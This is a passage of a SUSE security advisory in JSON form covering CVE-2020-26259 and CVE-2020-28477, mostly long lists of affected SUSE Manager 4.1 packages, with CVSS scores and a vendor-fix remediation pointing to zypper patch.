"SUSE Manager Server Module 4.1:prometheus-exporters-formula-0.9.0-3.19.2.noarch",
"SUSE Manager Server Module 4.1:prometheus-formula-0.3.1-3.6.2.noarch",
"SUSE Manager Server Module 4.1:py26-compat-salt-2016.11.10-6.11.2.noarch",
"SUSE Manager Server Module 4.1:python3-mgr-osa-common-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:python3-mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:python3-rhnlib-4.1.3-4.3.2.noarch",
"SUSE Manager Server Module 4.1:python3-spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.ppc64le",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.s390x",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.x86_64",
"SUSE Manager Server Module 4.1:spacewalk-backend-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-app-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-applet-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-common-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-tool-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-iss-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-iss-export-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-package-push-server-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-server-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-sql-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-sql-postgresql-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-tools-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-xml-export-libs-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-xmlrpc-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-minimal-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-minimal-config-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Server Module 4.1:spacewalk-config-4.1.5-3.3.2.noarch",
"SUSE Manager Server Module 4.1:spacewalk-html-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-config-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-lib-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-postgresql-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-taskomatic-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-utils-4.1.14-3.12.2.noarch",
"SUSE Manager Server Module 4.1:spacewalk-utils-extras-4.1.14-3.12.2.noarch",
"SUSE Manager Server Module 4.1:subscription-matcher-0.26-3.6.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.ppc64le",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.s390x",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.x86_64",
"SUSE Manager Server Module 4.1:susemanager-doc-indexes-4.1-11.28.4.noarch",
"SUSE Manager Server Module 4.1:susemanager-docs_en-4.1-11.28.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-docs_en-pdf-4.1-11.28.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-schema-4.1.19-3.24.4.noarch",
"SUSE Manager Server Module 4.1:susemanager-sls-4.1.21-3.26.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.ppc64le",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.s390x",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.x86_64",
"SUSE Manager Server Module 4.1:susemanager-web-libs-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:uyuni-config-modules-4.1.21-3.26.2.noarch",
"SUSE Manager Server Module 4.1:xpp3-1.1.4c-11.2.2.noarch",
"SUSE Manager Server Module 4.1:xpp3-minimal-1.1.4c-11.2.2.noarch",
"SUSE Manager Server Module 4.1:xstream-1.4.15-3.5.2.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2020-26259",
"url": "https://www.suse.com/security/cve/CVE-2020-26259"
},
{
"category": "external",
"summary": "SUSE Bug 1180145 for CVE-2020-26259",
"url": "https://bugzilla.suse.com/1180145"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Manager Proxy Module 4.1:mgr-osad-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-mgr-osa-common-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-mgr-osad-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-rhnlib-4.1.3-4.3.2.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-check-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-client-setup-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-backend-4.1.21-4.22.7.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-base-minimal-4.1.23-3.18.6.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-base-minimal-config-4.1.23-3.18.6.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-check-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-client-setup-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-broker-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-common-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-installer-4.1.6-3.3.2.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-management-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-package-manager-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-redirect-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-salt-4.1.4-3.9.4.noarch",
"SUSE Manager Server Module 4.1:cobbler-3.0.0+git20190806.32c4bae0-5.6.4.noarch",
"SUSE Manager Server Module 4.1:grafana-formula-0.4.0-3.6.2.noarch",
"SUSE Manager Server Module 4.1:mgr-libmod-4.1.7-3.16.2.noarch",
"SUSE Manager Server Module 4.1:mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:prometheus-exporters-formula-0.9.0-3.19.2.noarch",
"SUSE Manager Server Module 4.1:prometheus-formula-0.3.1-3.6.2.noarch",
"SUSE Manager Server Module 4.1:py26-compat-salt-2016.11.10-6.11.2.noarch",
"SUSE Manager Server Module 4.1:python3-mgr-osa-common-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:python3-mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:python3-rhnlib-4.1.3-4.3.2.noarch",
"SUSE Manager Server Module 4.1:python3-spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.ppc64le",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.s390x",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.x86_64",
"SUSE Manager Server Module 4.1:spacewalk-backend-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-app-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-applet-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-common-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-tool-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-iss-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-iss-export-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-package-push-server-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-server-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-sql-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-sql-postgresql-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-tools-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-xml-export-libs-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-xmlrpc-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-minimal-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-minimal-config-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Server Module 4.1:spacewalk-config-4.1.5-3.3.2.noarch",
"SUSE Manager Server Module 4.1:spacewalk-html-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-config-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-lib-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-postgresql-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-taskomatic-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-utils-4.1.14-3.12.2.noarch",
"SUSE Manager Server Module 4.1:spacewalk-utils-extras-4.1.14-3.12.2.noarch",
"SUSE Manager Server Module 4.1:subscription-matcher-0.26-3.6.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.ppc64le",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.s390x",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.x86_64",
"SUSE Manager Server Module 4.1:susemanager-doc-indexes-4.1-11.28.4.noarch",
"SUSE Manager Server Module 4.1:susemanager-docs_en-4.1-11.28.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-docs_en-pdf-4.1-11.28.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-schema-4.1.19-3.24.4.noarch",
"SUSE Manager Server Module 4.1:susemanager-sls-4.1.21-3.26.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.ppc64le",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.s390x",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.x86_64",
"SUSE Manager Server Module 4.1:susemanager-web-libs-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:uyuni-config-modules-4.1.21-3.26.2.noarch",
"SUSE Manager Server Module 4.1:xpp3-1.1.4c-11.2.2.noarch",
"SUSE Manager Server Module 4.1:xpp3-minimal-1.1.4c-11.2.2.noarch",
"SUSE Manager Server Module 4.1:xstream-1.4.15-3.5.2.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Manager Proxy Module 4.1:mgr-osad-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-mgr-osa-common-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-mgr-osad-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-rhnlib-4.1.3-4.3.2.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-check-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-client-setup-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-backend-4.1.21-4.22.7.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-base-minimal-4.1.23-3.18.6.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-base-minimal-config-4.1.23-3.18.6.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-check-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-client-setup-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-broker-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-common-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-installer-4.1.6-3.3.2.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-management-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-package-manager-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-redirect-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-salt-4.1.4-3.9.4.noarch",
"SUSE Manager Server Module 4.1:cobbler-3.0.0+git20190806.32c4bae0-5.6.4.noarch",
"SUSE Manager Server Module 4.1:grafana-formula-0.4.0-3.6.2.noarch",
"SUSE Manager Server Module 4.1:mgr-libmod-4.1.7-3.16.2.noarch",
"SUSE Manager Server Module 4.1:mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:prometheus-exporters-formula-0.9.0-3.19.2.noarch",
"SUSE Manager Server Module 4.1:prometheus-formula-0.3.1-3.6.2.noarch",
"SUSE Manager Server Module 4.1:py26-compat-salt-2016.11.10-6.11.2.noarch",
"SUSE Manager Server Module 4.1:python3-mgr-osa-common-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:python3-mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:python3-rhnlib-4.1.3-4.3.2.noarch",
"SUSE Manager Server Module 4.1:python3-spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.ppc64le",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.s390x",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.x86_64",
"SUSE Manager Server Module 4.1:spacewalk-backend-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-app-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-applet-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-common-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-tool-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-iss-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-iss-export-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-package-push-server-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-server-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-sql-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-sql-postgresql-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-tools-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-xml-export-libs-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-xmlrpc-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-minimal-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-minimal-config-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Server Module 4.1:spacewalk-config-4.1.5-3.3.2.noarch",
"SUSE Manager Server Module 4.1:spacewalk-html-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-config-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-lib-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-postgresql-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-taskomatic-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-utils-4.1.14-3.12.2.noarch",
"SUSE Manager Server Module 4.1:spacewalk-utils-extras-4.1.14-3.12.2.noarch",
"SUSE Manager Server Module 4.1:subscription-matcher-0.26-3.6.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.ppc64le",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.s390x",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.x86_64",
"SUSE Manager Server Module 4.1:susemanager-doc-indexes-4.1-11.28.4.noarch",
"SUSE Manager Server Module 4.1:susemanager-docs_en-4.1-11.28.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-docs_en-pdf-4.1-11.28.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-schema-4.1.19-3.24.4.noarch",
"SUSE Manager Server Module 4.1:susemanager-sls-4.1.21-3.26.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.ppc64le",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.s390x",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.x86_64",
"SUSE Manager Server Module 4.1:susemanager-web-libs-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:uyuni-config-modules-4.1.21-3.26.2.noarch",
"SUSE Manager Server Module 4.1:xpp3-1.1.4c-11.2.2.noarch",
"SUSE Manager Server Module 4.1:xpp3-minimal-1.1.4c-11.2.2.noarch",
"SUSE Manager Server Module 4.1:xstream-1.4.15-3.5.2.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2021-03-19T15:18:39Z",
"details": "moderate"
}
],
"title": "CVE-2020-26259"
},
{
"cve": "CVE-2020-28477",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2020-28477"
}
],
"notes": [
{
"category": "general",
"text": "This affects all versions of package immer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Manager Proxy Module 4.1:mgr-osad-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-mgr-osa-common-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-mgr-osad-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-rhnlib-4.1.3-4.3.2.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-check-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-client-setup-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-backend-4.1.21-4.22.7.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-base-minimal-4.1.23-3.18.6.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-base-minimal-config-4.1.23-3.18.6.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-check-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-client-setup-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-broker-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-common-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-installer-4.1.6-3.3.2.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-management-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-package-manager-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-redirect-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-salt-4.1.4-3.9.4.noarch",
"SUSE Manager Server Module 4.1:cobbler-3.0.0+git20190806.32c4bae0-5.6.4.noarch",
"SUSE Manager Server Module 4.1:grafana-formula-0.4.0-3.6.2.noarch",
"SUSE Manager Server Module 4.1:mgr-libmod-4.1.7-3.16.2.noarch",
"SUSE Manager Server Module 4.1:mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:prometheus-exporters-formula-0.9.0-3.19.2.noarch",
"SUSE Manager Server Module 4.1:prometheus-formula-0.3.1-3.6.2.noarch",
"SUSE Manager Server Module 4.1:py26-compat-salt-2016.11.10-6.11.2.noarch",
"SUSE Manager Server Module 4.1:python3-mgr-osa-common-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:python3-mgr-osa-dispatcher-4.1.5-2.9.4.noarch",
"SUSE Manager Server Module 4.1:python3-rhnlib-4.1.3-4.3.2.noarch",
"SUSE Manager Server Module 4.1:python3-spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.ppc64le",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.s390x",
"SUSE Manager Server Module 4.1:smdba-1.7.8-0.3.6.2.x86_64",
"SUSE Manager Server Module 4.1:spacewalk-backend-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-app-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-applet-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-common-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-config-files-tool-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-iss-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-iss-export-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-package-push-server-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-server-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-sql-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-sql-postgresql-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-tools-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-xml-export-libs-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-backend-xmlrpc-4.1.21-4.22.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-minimal-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-base-minimal-config-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Server Module 4.1:spacewalk-config-4.1.5-3.3.2.noarch",
"SUSE Manager Server Module 4.1:spacewalk-html-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-config-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-lib-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-java-postgresql-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-taskomatic-4.1.30-3.31.7.noarch",
"SUSE Manager Server Module 4.1:spacewalk-utils-4.1.14-3.12.2.noarch",
"SUSE Manager Server Module 4.1:spacewalk-utils-extras-4.1.14-3.12.2.noarch",
"SUSE Manager Server Module 4.1:subscription-matcher-0.26-3.6.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.ppc64le",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.s390x",
"SUSE Manager Server Module 4.1:susemanager-4.1.24-3.20.2.x86_64",
"SUSE Manager Server Module 4.1:susemanager-doc-indexes-4.1-11.28.4.noarch",
"SUSE Manager Server Module 4.1:susemanager-docs_en-4.1-11.28.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-docs_en-pdf-4.1-11.28.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-schema-4.1.19-3.24.4.noarch",
"SUSE Manager Server Module 4.1:susemanager-sls-4.1.21-3.26.2.noarch",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.ppc64le",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.s390x",
"SUSE Manager Server Module 4.1:susemanager-tools-4.1.24-3.20.2.x86_64",
"SUSE Manager Server Module 4.1:susemanager-web-libs-4.1.23-3.18.6.noarch",
"SUSE Manager Server Module 4.1:uyuni-config-modules-4.1.21-3.26.2.noarch",
"SUSE Manager Server Module 4.1:xpp3-1.1.4c-11.2.2.noarch",
"SUSE Manager Server Module 4.1:xpp3-minimal-1.1.4c-11.2.2.noarch",
"SUSE Manager Server Module 4.1:xstream-1.4.15-3.5.2.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2020-28477",
"url": "https://www.suse.com/security/cve/CVE-2020-28477"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Manager Proxy Module 4.1:mgr-osad-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-mgr-osa-common-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-mgr-osad-4.1.5-2.9.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-rhnlib-4.1.3-4.3.2.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-check-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-client-setup-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:python3-spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-backend-4.1.21-4.22.7.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-base-minimal-4.1.23-3.18.6.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-base-minimal-config-4.1.23-3.18.6.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-check-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-client-setup-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-client-tools-4.1.9-4.12.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-broker-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-common-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-installer-4.1.6-3.3.2.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-management-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-package-manager-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-redirect-4.1.4-3.9.4.noarch",
"SUSE Manager Proxy Module 4.1:spacewalk-proxy-salt-4.1.4-3.9.4.noarch",
"SUSE Manager Server Module 4.1:cobbler-3.0.0+git20190806.32c4bae0-5.6.4.noarch",
"SUSE Manager Server Module 4.1:grafana-formula-0.4.0-3.6.2.noarch",
"SUSE Manager Server Module 4.1:mgr-libmod-4.1.7-3.16.2.noarch",
